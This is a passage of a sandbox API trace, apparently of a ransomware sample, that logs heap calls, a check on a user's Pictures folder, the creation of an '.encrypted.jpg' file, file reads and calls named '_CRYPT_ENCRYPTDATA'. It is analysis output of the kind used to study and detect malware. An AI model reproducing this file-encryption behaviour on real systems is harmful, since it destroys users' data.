0x8897f0 [0040.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0040.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0040.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0040.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0040.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0040.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0040.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0040.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0040.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0040.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0040.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0040.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0040.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0040.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0040.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0040.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0040.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0040.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0040.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0040.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0040.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0040.345] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt")) returned 0x10 [0040.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0040.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0040.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0040.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0040.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0040.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0040.345] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0040.345] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\T4n1IOAv.encrypted.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\t4n1ioav.encrypted.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0040.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0040.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0040.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0040.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0040.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0040.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0040.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0040.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0040.346] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0040.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0040.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0040.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0040.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0040.346] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0040.347] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0040.347] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0040.347] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0040.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0040.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0040.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0040.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0040.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0040.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0040.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0040.347] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0040.347] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0040.350] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x7ce9, lpOverlapped=0x0) returned 1 [0040.351] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0040.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0040.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0040.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17ce9) returned 0xac2018 [0040.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0040.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0040.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0040.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0040.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0040.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0040.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17ce9) returned 0x935008 [0040.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0040.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.354] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0040.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0040.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17ce9) returned 0xac2018 [0040.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0040.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0040.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0040.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.355] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0040.355] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0040.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0040.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0040.355] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0040.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0040.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0040.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0040.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0040.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0040.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17ce9) returned 0xac2018 [0040.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0040.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0040.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0040.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0040.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3b8 [0040.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0040.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0040.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0040.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da408 [0040.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0040.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0040.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0040.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd18 [0040.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0040.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0040.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0040.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0040.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0040.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17ce9) returned 0x94cd00 [0040.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0040.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0040.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0040.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0040.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0040.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0040.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0040.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0040.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0040.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0040.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0040.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0040.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0040.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0040.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0040.358] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0040.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0040.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0040.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0040.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0040.358] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0040.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0040.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0040.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0040.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0040.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0040.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0040.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0040.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0040.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0040.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0040.358] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0040.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0040.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0040.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da238 [0040.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0040.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0040.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0040.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0040.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce80 [0040.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0040.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0040.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0040.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0040.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0040.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0040.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0040.359] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0040.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0040.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0040.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0040.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0040.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0040.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0040.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0040.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0040.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0040.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0040.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0040.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0040.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0040.359] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0040.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0040.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0040.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0040.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0040.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0040.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0040.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0040.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0040.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0040.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0040.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0040.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0040.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0040.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0040.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0040.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0040.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0040.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0040.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0040.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0040.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0040.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0040.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.360] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.360] RtlAllocateHeap (HeapHandle=0x770000, 